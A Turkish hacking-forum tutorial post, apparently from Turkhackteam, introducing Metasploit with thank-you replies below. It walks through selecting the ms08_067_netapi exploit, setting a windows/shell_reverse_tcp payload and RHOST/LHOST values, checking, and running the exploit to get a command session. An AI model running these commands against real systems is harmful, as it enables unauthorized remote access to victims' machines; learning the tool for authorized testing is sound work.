#Kali Linux Serisi#Web Explation Tools# 2.Bölüm #Ceys#

Ceys

Yaşayan Forum Efsanesi
2 Nis 2016
7,658
4,965
Orhun Nehri

+-----------------------------------------------------+
#Kali Linux Serisi#
#Web Explation Tools 2.Bölüm#
TurkHackTeam/Ceys
+-----------------------------------------------------+


>>ME TASPLOIT FRAMEWORK<<

Me tasploit: güvenlik testleri için geliştirilmiş olan bir penterestion aracıdır.
İçerisinde 1000 üzerinde exploit bulunur.
Basit web güvenlik testleri ve işletim sistemine yönelik testler gerçekleştirebilirsiniz.
Me tasploitin kendine ögü dosya sisteminin de olduğunu ekleyelim. Bunlar;

Data: Ham verilerdir. Bunlar me tasploit tarafından kullanılır ve değiştirilir.
Lib: Framework'u oluşturan sistemdir, kütüphane gibi..
Plugins: Otomatik çalışan ve frameworkun özelliklerini kullanan sistemlerdir.
Tools: Komut satırında çalışan araçlar.
External: harici kaynaklardır.
Do-cu-me-nation: Framewor'u bilgilendiren belgelerdir..
Modules: normal modüllerimiz.
Scripts: meterpreter gibi araçlar.
daha birçok dosya vardır bunlar başlıca önemli olanlar...

me tasploiti konsola msfconsole yazarak başlatabilirisiniz..


>>EXPLOIT SEÇME<<

Me tasploiti açtıktan sonra exploit seçerken use komutunu kullanırız.
Örneğin;

use exploit/windows/smb/ms08_067_netapi

bir exploiti seçtiğinizde aktifleşince bu şekilde görünür..



>>PAYLOAD SEÇME ve EXPLOİTE UYGUN PAYLOADIN LİSTELENMESİ<<

Payload: exploit seçtikten sonra sistemde ilerlemeyi sağlayan modüllerdir.

Payload seçiminde buna uygun bir exploit seçmeliyiz.
Bu kısmı ilerleyen konularda işlemeyi düşünüyorum burda sadece kısaca değinmek istedim.
Konsola

show payloads

yazarak payloadları görebilirsiniz.



Örnek olarak

set PAYLOAD windows/shell_reverse_tcp



sistem exploit edildiğinde bu payload devreye girer..

>>PARAMETRELERİ TANIMA<<

Parametreleri görmek için ;


komutunu konsolda çalıştırırız.



Üst kısımda modül, alt kısımda payloadlar görünür.

Name: paremetre adı
Current Setting: parametreye ait girilen değer.
Required: girilmesi zorunlu olanlar. NO yada YES yazar.
Description: parametreye ait açıklamalar.

Kırmızı ile işaretli yere dikkat ederek ve bilgilere dayanarak parametreler girilmelidir.

Konsola sırasıyla;

set RHOST 192.168.2.89

set LHOST 192.168.2.107​

komutlarını girelim.. bu şekilde devam ediyoruz..



Exploit Target: Hedefin uyumlu olduğu sistemler gösterliyor burda..
Konsola show targets yazarak görüntüleyebiliriz..



Eğer hedef sistem biliniyorsa girilir fakat bilinmiyorsa,
set target ID şeklinde girilir
ID solda yazan değerdir.

>>AÇIK KONTROL ETME<<

check komutu ile açığı kontrol edebiliriz. Tabi bundan önce istenilen değerleri girmek gerekir ki biz girdik.
Eğer The target is vulnereable değeri dönerse açık vardır aks halde yoktur.



>>EXPLOITIN UYGULANMASI<<

Gerekli olan yerleri doldurduktan sonra exploit aşamasına geçilir.
Bunun için konsola exploit yazmak yeterlidir.



Gördüğünüz gibi hedefin command oturumuna geçtik.

>>EXPLOIT ARAMA<<

Bu kısım önemli aşamalardan biridir.
Örneğin bir exploitin databasesinde açık gördünüz diyelim..
bu açığı me tasploitte arayabiliriz.


komutu ile parametrelere bakalım..



burda ne tür arama yapacağımızı görüyoruz..

Usage: search[Keywords]
Keywords:
app : Modülün kim tarafından çalıştırdırğı (sunucu yada istemci)
author : Modülü bulan kişiye göre arama
bid : Bugtraq ID'ye göre arama
cve : CVE ID'ye göre arama
edb : Exploit-DB ID'ye göre arama
name : Modül ismine göre arama
platform : Platforma göre arama
ref : Referansa göre arama
type : Tipe göre arama(exploit, post yada auxiliary)

Bu arama çeşitler açıklanmış konsoda..

>>ARAÇLAR HAKKINDA BİLGİ EDİNME<<

bunu info komutu ile yapıyoruz.






Burda asıl önemli olan yerler;
Description ve References kısımlarıdır.
References kısmında exploitin tamamı ve açığın risk seviyesi bulunur.
Description kısmında ise açık ve exploit hakkında açıklama vardır.

VİDEOLU ANLATIM



[ame]https://www.youtube.com/watch?v=XFcO84gcxZ8[/ame]



ME TASPLOIT FRAMEWORK kısmı kısaca bu kadar arkadaşlar.
Eğer daha detaya inersek içinden çıkamayız.
Sağlıcakla kalın//Ceys
 
Son düzenleme:

ZehirBey

Katılımcı Üye
14 Mar 2017
262
0
While
Kali Linux'un Bu Bölümüde Takınlan Arkadaşlar İçin Yararlı Bir Paylaşım Olmuş,Elinize Sağlık Komutanım :)
 

Ultimir

Uzman üye
17 Nis 2012
1,312
1
İstanbul
THT'de bulunan değer verilmiş ve nadir olan özgün içerik.
Ellerine sağlık, her ne kadar konuyu anlamamış olsam da verdiğim teşekkürü gerçekten hak ediyorsun
Ellerine sağlık tekrardan konu için :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.